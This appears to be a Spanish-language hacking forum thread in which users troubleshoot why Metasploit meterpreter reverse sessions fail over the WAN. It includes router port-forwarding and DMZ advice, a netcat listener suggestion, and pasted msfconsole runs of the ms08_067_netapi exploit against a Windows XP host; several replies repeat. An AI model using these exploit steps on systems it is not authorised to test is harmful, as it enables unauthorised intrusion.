Buenas tardes compañeros, tengo unas cuantas dudas en cuanto a las sesiones de meterpreter
A la hora de explotar vulnerabilidades en una red lan no he tenido problemas de ningun tipo puesto que me abre las sesiones perfectamente
el caso es cuando intento abrir una sesion a traves de la WAN, segun había entendido bastaba con poner tu ip pública en el LHOST pero cuando intento crear la sesion...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
Mi pregunta es la siguiente...
tengo q tocar algo en la configuracion de mi router (sea puertos etc) para que dirija la conexion de mi ip publica a la privada?
En caso de tener mi equipo metido en el DMZ seria necesario igualmente?? (por lo que se los equipos en DMZ estan totalmente expuestos a la red y se que no es muy recomendable, pero tengo un router algo extraño y la verdad es que me pierdo un poco en la interfaz de configuracion entonces para algo puntual si vasta con meterme en el DMZ no me importaria)
Aclaro que no estoy trabajando desde ninguna maquina virtual tengo el BT5 instalado en una particion del HD por lo tanto trabaja como S.O principal...
gracias de antemano por su tiempo.
settea el puerto por el que te va a devolver el meterpreter.
Primero coge el netcat y ponlo a la escucha en el puerto que abriste en el router y bueno mejor enviame un privado y te enseño bro
;)
Primero coge el netcat y ponlo a la escucha en el puerto que abriste en el router y bueno mejor enviame un privado y te enseño bro
;)
Pz me sale lo mismo :
[*] Meterpreter session 19 closed. Reason: User exit
msf exploit(ms08_067_netapi) > set rhost 192.168.1.36
rhost => 192.168.1.36
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.19:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
No se pork parece que sta parchado :
[*] Meterpreter session 19 closed. Reason: User exit
msf exploit(ms08_067_netapi) > set rhost 192.168.1.36
rhost => 192.168.1.36
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.19:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
No se pork parece que sta parchado :
Buenas
En lo que a mi respecta el poco tiempo que tengo usando metasploit es bueno al usarlo con maquinas de tu propia red
pero al usarlo remotamente... no es bueno... uso infinitum y eh puesto a mi router de cabeza, ponerle LHOST tu ip "publica" por mas que tengaz DMZ todo abierto, no sirve de nada nunca abre sesiones.
Saludos.
En lo que a mi respecta el poco tiempo que tengo usando metasploit es bueno al usarlo con maquinas de tu propia red
pero al usarlo remotamente... no es bueno... uso infinitum y eh puesto a mi router de cabeza, ponerle LHOST tu ip "publica" por mas que tengaz DMZ todo abierto, no sirve de nada nunca abre sesiones.
Saludos.
